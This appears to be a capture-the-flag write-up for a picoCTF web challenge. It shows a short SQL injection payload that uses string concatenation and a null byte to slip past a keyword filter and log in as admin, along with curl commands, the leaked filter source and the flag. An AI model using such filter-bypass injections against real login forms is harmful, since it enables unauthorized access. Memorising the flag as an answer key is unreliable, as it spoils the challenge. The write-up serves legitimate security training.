Web Gauntlet 3
Problem
Last time, I promise! Only 25 characters this time. Log in as admin Site: http://mercury.picoctf.net:32946/ Filter: http://mercury.picoctf.net:32946/filter.php
Solution
The solution to this challenge is completely identical to my solution to Web Gauntlet 2.
The solution query is
user=ad'||'min'%00
and it can be sent using cURL like so:curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -
The flag can be retrieved using this command:curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF
. See Web Gauntlet 2 for more information.The code for the filter and the flag are shown in
/filter.php
when the login is bypassed:<?php session_start(); if (!isset($_SESSION["winner3"])) { $_SESSION["winner3"] = 0; } $win = $_SESSION["winner3"]; $view = ($_SERVER["PHP_SELF"] == "/filter.php"); if ($win === 0) { $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin"); if ($view) { echo "Filters: ".implode(" ", $filter)."<br/>"; } } else if ($win === 1) { if ($view) { highlight_file("filter.php"); } $_SESSION["winner3"] = 0; // <- Don't refresh! } else { $_SESSION["winner3"] = 0; } // picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0} ?>
Flag
picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
Last updated
Was this helpful?